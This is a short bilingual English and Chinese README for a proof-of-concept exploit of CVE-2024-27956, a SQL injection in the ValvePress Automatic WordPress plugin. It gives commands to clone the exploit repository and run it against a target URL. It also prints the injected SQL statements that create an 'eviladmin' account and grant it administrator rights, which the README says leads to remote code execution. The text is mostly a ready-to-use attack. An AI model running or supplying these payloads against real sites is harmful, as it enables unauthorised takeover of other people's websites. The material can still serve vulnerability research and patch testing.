
Proof-of-concept exploit for CVE-2024-27956, a SQL injection in ValvePress Automatic WordPress plugin. Creates admin user and enables remote code execution via unsanitized input.
CVE-2024-27956 的 PoC,ValvePress Automatic 插件中的 SQL 注入漏洞。该 PoC 利用此漏洞在目标站点中创建用户并赋予管理员权限。在 WordPress 中获得管理员权限可导致远程代码执行。
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')
赋予管理员权限:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
在 q 参数中,我们可以传入完整的查询语句,然后它就会被执行。
用户输入直接被执行,没有任何形式的限制或过滤。
